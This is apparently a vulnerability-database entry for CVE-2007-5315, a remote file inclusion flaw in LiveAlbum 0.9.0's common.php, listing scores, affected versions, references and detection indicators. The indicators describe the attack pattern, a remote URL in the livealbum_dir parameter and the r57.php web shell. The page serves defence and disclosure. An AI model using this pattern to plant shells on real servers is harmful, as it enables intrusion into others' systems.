CVE-2007-5315
published 2007-10-09CVE-2007-5315: PHP remote file inclusion vulnerability in common.php in LiveAlbum 0.9.0, when register_globals is enabled, allows remote attackers to execute arbitrary PHP…
PriorityP344medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
38.56%
98.4th percentile
PHP remote file inclusion vulnerability in common.php in LiveAlbum 0.9.0, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the livealbum_dir parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| softpedia | livealbum | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect HTTP requests to common.php with a remote URL supplied in the livealbum_dir parameter, indicating RFI exploitation attempt. ↗
- →Monitor GET/POST requests where the livealbum_dir parameter contains an http:// or https:// URL, especially those ending with a trailing '?' (null-byte/parameter injection pattern). ↗
- →Presence of r57.php in the livealbum_dir parameter value is a strong indicator of RFI shell-drop activity. ↗
- ·The vulnerability is only exploitable when register_globals is enabled in the PHP configuration; installations with register_globals disabled are not affected. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://osvdb.org/37618http://secunia.com/advisories/27139http://www.vupen.com/english/advisories/2007/3446https://exchange.xforce.ibmcloud.com/vulnerabilities/37028https://www.exploit-db.com/exploits/4503http://osvdb.org/37618http://secunia.com/advisories/27139http://www.vupen.com/english/advisories/2007/3446https://exchange.xforce.ibmcloud.com/vulnerabilities/37028https://www.exploit-db.com/exploits/4503
2007-10-09
Published